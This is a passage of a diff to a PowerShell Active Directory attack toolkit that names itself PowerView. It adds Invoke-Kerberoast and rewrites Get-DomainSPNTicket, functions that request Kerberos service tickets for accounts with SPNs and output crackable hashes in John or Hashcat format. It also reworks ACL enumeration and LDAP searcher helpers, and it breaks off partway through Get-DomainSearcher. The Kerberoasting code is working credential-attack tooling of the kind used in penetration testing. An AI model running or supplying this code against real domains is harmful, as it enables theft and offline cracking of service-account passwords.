+ }
}
- process {
- ForEach($UserSPN in $SPN) {
- Write-Verbose "Requesting ticket for: $UserSPN"
- if (!$EncPart) {
- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ PROCESS {
+ if ($PSBoundParameters['User']) {
+ $TargetObject = $User
+ }
+ else {
+ $TargetObject = $SPN
+ }
+
+ ForEach ($Object in $TargetObject) {
+ if ($PSBoundParameters['User']) {
+ $UserSPN = $Object.ServicePrincipalName
+ $SamAccountName = $Object.SamAccountName
+ $DistinguishedName = $Object.DistinguishedName
}
else {
+ $UserSPN = $Object
+ $SamAccountName = 'UNKNOWN'
+ $DistinguishedName = 'UNKNOWN'
+ }
+
+ # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
+ if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {
+ $UserSPN = $UserSPN[0]
+ }
+
+ try {
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ }
+ catch {
+ Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
+ }
+ if ($Ticket) {
$TicketByteStream = $Ticket.GetRequest()
- if ($TicketByteStream)
- {
- $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-"
- [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
- $Parts.RemoveAt($Parts.Count - 1)
- $Parts -join "A48201"
- break
+ }
+ if ($TicketByteStream) {
+ $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
+ [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
+ $Parts.RemoveAt($Parts.Count - 1)
+ $Hash = $Parts -join 'A48201'
+ $Hash = $Hash.Insert(32, '$')
+
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
+ $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
+ $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName
+
+ if ($OutputFormat -match 'John') {
+ $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
}
+ else {
+ if ($DistinguishedName -ne 'UNKNOWN') {
+ $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ else {
+ $UserDomain = 'UNKNOWN'
+ }
+
+ # hashcat output format
+ $HashFormat = "`$krb5tgs`$23`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+ }
+ $Out | Add-Member Noteproperty 'Hash' $HashFormat
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
+ Write-Output $Out
}
}
}
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
}
-function Get-PathAcl {
+function Invoke-Kerberoast {
<#
- .SYNOPSIS
-
- Enumerates the ACL for a given file path.
+.SYNOPSIS
+
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
+
+.DESCRIPTION
+
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat <John/Hashcat>.
- .PARAMETER Path
+.PARAMETER Identity
- The local/remote path to enumerate the ACLs for.
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
- .PARAMETER Recurse
-
- If any ACL results are groups, recurse and retrieve user membership.
+.PARAMETER Domain
- .EXAMPLE
+Specifies the domain to use for the query, defaults to the current domain.
- PS C:\> Get-PathAcl "\\SERVER\Share\"
-
- Returns ACLs for the given UNC share.
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Invoke-Kerberoast | fl
+
+Kerberoasts all found SPNs for the current domain.
+
+.EXAMPLE
+
+Invoke-Kerberoast -Domain dev.testlab.local -OutputFormat HashCat | fl
+
+Kerberoasts all found SPNs for the testlab.local domain, outputting to HashCat
+format instead of John (the default).
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl
+
+Kerberoasts all found SPNs for the testlab.local domain using alternate credentials.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.SPNTicket')]
[CmdletBinding()]
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
[String]
- $Path,
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $Recurse
+ $Tombstone,
+
+ [ValidateSet('John', 'Hashcat')]
+ [Alias('Format')]
+ [String]
+ $OutputFormat = 'John',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
+ BEGIN {
+ $UserSearcherArguments = @{
+ 'SPN' = $True
+ 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname'
+ }
+ if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
- function Convert-FileRight {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
+ Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
+}
+
+
+function Get-PathAcl {
+<#
+.SYNOPSIS
+
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
+
+.DESCRIPTION
+
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats. If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+.PARAMETER Path
+
+Specifies the local or remote path to enumerate the ACLs for.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target path.
+
+.EXAMPLE
+
+Get-PathAcl "\\SERVER\Share\"
+
+Returns ACLs for the given UNC share.
+
+.EXAMPLE
+
+gci .\test.txt | Get-PathAcl
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred
+
+.INPUTS
+
+String
+
+One of more paths to enumerate ACLs for.
+
+.OUTPUTS
+
+PowerView.FileACL
+
+A custom object with the full path and associated ACL entries.
+
+.LINK
+
+https://support.microsoft.com/en-us/kb/305144
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.FileACL')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('FullName')]
+ [String[]]
+ $Path,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # From http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
+ BEGIN {
+ function Convert-FileRight {
+ # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
[CmdletBinding()]
- param(
+ Param(
[Int]
$FSR
)
$AccessMask = @{
- [uint32]'0x80000000' = 'GenericRead'
- [uint32]'0x40000000' = 'GenericWrite'
- [uint32]'0x20000000' = 'GenericExecute'
- [uint32]'0x10000000' = 'GenericAll'
- [uint32]'0x02000000' = 'MaximumAllowed'
- [uint32]'0x01000000' = 'AccessSystemSecurity'
- [uint32]'0x00100000' = 'Synchronize'
- [uint32]'0x00080000' = 'WriteOwner'
- [uint32]'0x00040000' = 'WriteDAC'
- [uint32]'0x00020000' = 'ReadControl'
- [uint32]'0x00010000' = 'Delete'
- [uint32]'0x00000100' = 'WriteAttributes'
- [uint32]'0x00000080' = 'ReadAttributes'
- [uint32]'0x00000040' = 'DeleteChild'
- [uint32]'0x00000020' = 'Execute/Traverse'
- [uint32]'0x00000010' = 'WriteExtendedAttributes'
- [uint32]'0x00000008' = 'ReadExtendedAttributes'
- [uint32]'0x00000004' = 'AppendData/AddSubdirectory'
- [uint32]'0x00000002' = 'WriteData/AddFile'
- [uint32]'0x00000001' = 'ReadData/ListDirectory'
+ [uint32]'0x80000000' = 'GenericRead'
+ [uint32]'0x40000000' = 'GenericWrite'
+ [uint32]'0x20000000' = 'GenericExecute'
+ [uint32]'0x10000000' = 'GenericAll'
+ [uint32]'0x02000000' = 'MaximumAllowed'
+ [uint32]'0x01000000' = 'AccessSystemSecurity'
+ [uint32]'0x00100000' = 'Synchronize'
+ [uint32]'0x00080000' = 'WriteOwner'
+ [uint32]'0x00040000' = 'WriteDAC'
+ [uint32]'0x00020000' = 'ReadControl'
+ [uint32]'0x00010000' = 'Delete'
+ [uint32]'0x00000100' = 'WriteAttributes'
+ [uint32]'0x00000080' = 'ReadAttributes'
+ [uint32]'0x00000040' = 'DeleteChild'
+ [uint32]'0x00000020' = 'Execute/Traverse'
+ [uint32]'0x00000010' = 'WriteExtendedAttributes'
+ [uint32]'0x00000008' = 'ReadExtendedAttributes'
+ [uint32]'0x00000004' = 'AppendData/AddSubdirectory'
+ [uint32]'0x00000002' = 'WriteData/AddFile'
+ [uint32]'0x00000001' = 'ReadData/ListDirectory'
}
$SimplePermissions = @{
- [uint32]'0x1f01ff' = 'FullControl'
- [uint32]'0x0301bf' = 'Modify'
- [uint32]'0x0200a9' = 'ReadAndExecute'
- [uint32]'0x02019f' = 'ReadAndWrite'
- [uint32]'0x020089' = 'Read'
- [uint32]'0x000116' = 'Write'
+ [uint32]'0x1f01ff' = 'FullControl'
+ [uint32]'0x0301bf' = 'Modify'
+ [uint32]'0x0200a9' = 'ReadAndExecute'
+ [uint32]'0x02019f' = 'ReadAndWrite'
+ [uint32]'0x020089' = 'Read'
+ [uint32]'0x000116' = 'Write'
}
$Permissions = @()
# get simple permission
- $Permissions += $SimplePermissions.Keys | % {
+ $Permissions += $SimplePermissions.Keys | ForEach-Object {
if (($FSR -band $_) -eq $_) {
$SimplePermissions[$_]
$FSR = $FSR -band (-not $_)
@@ -1475,134 +3055,89 @@ function Get-PathAcl {
}
# get remaining extended permissions
- $Permissions += $AccessMask.Keys |
- ? { $FSR -band $_ } |
- % { $AccessMask[$_] }
-
- ($Permissions | ?{$_}) -join ","
+ $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] }
+ ($Permissions | Where-Object {$_}) -join ','
}
- }
-
- process {
- try {
- $ACL = Get-Acl -Path $Path
-
- $ACL.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
-
- $Names = @()
- if ($_.IdentityReference -match '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+') {
- $Object = Get-ADObject -SID $_.IdentityReference
- $Names = @()
- $SIDs = @($Object.objectsid)
+ $ConvertArguments = @{}
+ if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
- if ($Recurse -and (@('268435456','268435457','536870912','536870913') -contains $Object.samAccountType)) {
- $SIDs += Get-NetGroupMember -SID $Object.objectsid | Select-Object -ExpandProperty MemberSid
- }
+ $MappedComputers = @{}
+ }
- $SIDs | ForEach-Object {
- $Names += ,@($_, (Convert-SidToName $_))
+ PROCESS {
+ ForEach ($TargetPath in $Path) {
+ try {
+ if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $HostComputer = (New-Object System.Uri($TargetPath)).Host
+ if (-not $MappedComputers[$HostComputer]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+ $MappedComputers[$HostComputer] = $True
}
}
- else {
- $Names += ,@($_.IdentityReference.Value, (Convert-SidToName $_.IdentityReference.Value))
- }
- ForEach($Name in $Names) {
+ $ACL = Get-Acl -Path $TargetPath
+
+ $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
+ $SID = $_.IdentityReference.Value
+ $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments
+
$Out = New-Object PSObject
- $Out | Add-Member Noteproperty 'Path' $Path
+ $Out | Add-Member Noteproperty 'Path' $TargetPath
$Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)
- $Out | Add-Member Noteproperty 'IdentityReference' $Name[1]
- $Out | Add-Member Noteproperty 'IdentitySID' $Name[0]
+ $Out | Add-Member Noteproperty 'IdentityReference' $Name
+ $Out | Add-Member Noteproperty 'IdentitySID' $SID
$Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL')
$Out
}
}
+ catch {
+ Write-Verbose "[Get-PathAcl] error: $_"
+ }
}
- catch {
- Write-Warning $_
- }
+ }
+
+ END {
+ # remove the IPC$ mappings
+ $MappedComputers.Keys | Remove-RemoteConnection
}
}
-filter Get-NameField {
+function Convert-LDAPProperty {
<#
- .SYNOPSIS
-
- Helper that attempts to extract appropriate field names from
- passed computer objects.
+.SYNOPSIS
- .PARAMETER Object
+Helper that converts specific LDAP property result fields and outputs
+a custom psobject.
- The passed object to extract name fields from.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- .PARAMETER DnsHostName
-
- A DnsHostName to extract through ValueFromPipelineByPropertyName.
+.DESCRIPTION
- .PARAMETER Name
-
- A Name to extract through ValueFromPipelineByPropertyName.
+Converts a set of raw LDAP properties results from ADSI/LDAP searches
+into a proper PSObject. Used by several of the Get-Domain* function.
- .EXAMPLE
-
- PS C:\> Get-NetComputer -FullData | Get-NameField
-#>
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
- [Object]
- $Object,
-
- [Parameter(ValueFromPipelineByPropertyName = $True)]
- [String]
- $DnsHostName,
-
- [Parameter(ValueFromPipelineByPropertyName = $True)]
- [String]
- $Name
- )
-
- if($PSBoundParameters['DnsHostName']) {
- $DnsHostName
- }
- elseif($PSBoundParameters['Name']) {
- $Name
- }
- elseif($Object) {
- if ( [bool]($Object.PSobject.Properties.name -match "dnshostname") ) {
- # objects from Get-NetComputer
- $Object.dnshostname
- }
- elseif ( [bool]($Object.PSobject.Properties.name -match "name") ) {
- # objects from Get-NetDomainController
- $Object.name
- }
- else {
- # strings and catch alls
- $Object
- }
- }
- else {
- return $Null
- }
-}
+.PARAMETER Properties
+Properties object to extract out LDAP fields for display.
-function Convert-LDAPProperty {
-<#
- .SYNOPSIS
-
- Helper that converts specific LDAP property result fields.
- Used by several of the Get-Net* function.
+.OUTPUTS
- .PARAMETER Properties
+System.Management.Automation.PSCustomObject
- Properties object to extract out LDAP fields for display.
+A custom PSObject with LDAP hashtable properties translated.
#>
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.Management.Automation.PSCustomObject')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
$Properties
)
@@ -1610,857 +3145,1683 @@ function Convert-LDAPProperty {
$ObjectProperties = @{}
$Properties.PropertyNames | ForEach-Object {
- if (($_ -eq "objectsid") -or ($_ -eq "sidhistory")) {
- # convert the SID to a string
- $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0],0)).Value
- }
- elseif($_ -eq "objectguid") {
- # convert the GUID to a string
- $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
- }
- elseif( ($_ -eq "lastlogon") -or ($_ -eq "lastlogontimestamp") -or ($_ -eq "pwdlastset") -or ($_ -eq "lastlogoff") -or ($_ -eq "badPasswordTime") ) {
- # convert timestamps
- if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
- # if we have a System.__ComObject
- $Temp = $Properties[$_][0]
- [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
- [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
- $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
+ if ($_ -ne 'adspath') {
+ if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) {
+ # convert all listed sids (i.e. if multiple are listed in sidHistory)
+ $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value }
}
- else {
- $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
+ elseif ($_ -eq 'grouptype') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum
}
- }
- elseif($Properties[$_][0] -is [System.MarshalByRefObject]) {
- # try to convert misc com objects
- $Prop = $Properties[$_]
- try {
- $Temp = $Prop[$_][0]
- Write-Verbose $_
- [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
- [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
- $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
+ elseif ($_ -eq 'samaccounttype') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum
}
- catch {
- $ObjectProperties[$_] = $Prop[$_]
+ elseif ($_ -eq 'objectguid') {
+ # convert the GUID to a string
+ $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
+ }
+ elseif ($_ -eq 'useraccountcontrol') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum
+ }
+ elseif ($_ -eq 'ntsecuritydescriptor') {
+ # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+ $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+ if ($Descriptor.Owner) {
+ $ObjectProperties['Owner'] = $Descriptor.Owner
+ }
+ if ($Descriptor.Group) {
+ $ObjectProperties['Group'] = $Descriptor.Group
+ }
+ if ($Descriptor.DiscretionaryAcl) {
+ $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl
+ }
+ if ($Descriptor.SystemAcl) {
+ $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl
+ }
+ }
+ elseif ($_ -eq 'accountexpires') {
+ if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) {
+ $ObjectProperties[$_] = "NEVER"
+ }
+ else {
+ $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0])
+ }
+ }
+ elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) {
+ # convert timestamps
+ if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+ # if we have a System.__ComObject
+ $Temp = $Properties[$_][0]
+ [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
+ }
+ else {
+ # otherwise just a string
+ $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
+ }
+ }
+ elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+ # try to convert misc com objects
+ $Prop = $Properties[$_]
+ try {
+ $Temp = $Prop[$_][0]
+ [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
+ }
+ catch {
+ Write-Verbose "[Convert-LDAPProperty] error: $_"
+ $ObjectProperties[$_] = $Prop[$_]
+ }
+ }
+ elseif ($Properties[$_].count -eq 1) {
+ $ObjectProperties[$_] = $Properties[$_][0]
+ }
+ else {
+ $ObjectProperties[$_] = $Properties[$_]
}
- }
- elseif($Properties[$_].count -eq 1) {
- $ObjectProperties[$_] = $Properties[$_][0]
- }
- else {
- $ObjectProperties[$_] = $Properties[$_]
}
}
-
- New-Object -TypeName PSObject -Property $ObjectProperties
+ try {
+ New-Object -TypeName PSObject -Property $ObjectProperties
+ }
+ catch {
+ Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_"
+ }
}
-
########################################################
#
# Domain info functions below.
#
########################################################
-filter Get-DomainSearcher {
+function Get-DomainSearcher {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Helper used by various functions that builds a custom AD searcher object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain
- Helper used by various functions that takes an ADSpath and
- domain specifier and builds the correct ADSI searcher object.
+.DESCRIPTION
- .PARAMETER Domain
+Takes a given domain and a number of customizations and returns a
+System.DirectoryServices.DirectorySearcher object. This function is used
+heavily by other LDAP/ADSI searcher functions (Verb-Domain*).
- The domain to use for the query, defaults to the current domain.
+.PARAMETER Domain
- .PARAMETER DomainController
+Specifies the domain to use for the query, defaults to the current domain.
- Domain controller to reflect LDAP queries through.
+.PARAMETER LDAPFilter
- .PARAMETER ADSpath
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER Properties
- .PARAMETER ADSprefix
+Specifies the properties of the output object to retrieve from the server.
- Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER SearchBase
- .PARAMETER PageSize
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER SearchBasePrefix
- .PARAMETER Credential
+Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration").
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Server
- .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to for the search.
- PS C:\> Get-DomainSearcher -Domain testlab.local
+.PARAMETER SearchScope
- .EXAMPLE
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- PS C:\> Get-DomainSearcher -Domain testlab.local -DomainController SECONDARY.dev.testlab.local
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainSearcher -Domain testlab.local
+
+Return a searcher for all objects in testlab.local.
+
+.EXAMPLE
+
+Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'
+
+Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.
+
+.EXAMPLE
+
+Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
+
+Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU).
+
+.OUTPUTS
+
+System.DirectoryServices.DirectorySearcher
#>
- param(
- [Parameter(ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.DirectoryServices.DirectorySearcher')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
[String]
- $ADSpath,
+ $SearchBasePrefix,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $ADSprefix,
+ $Server,
- [ValidateRange(1,10000)]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit = 120,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if(-not $Credential) {
- if(-not $Domain) {
- $Domain = (Get-NetDomain).name
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $TargetDomain = $Domain
+ }
+ else {
+ # if not -Domain is specified, retrieve the current domain name
+ if ($PSBoundParameters['Credential']) {
+ $DomainObject = Get-Domain -Credential $Credential
+ }
+ else {
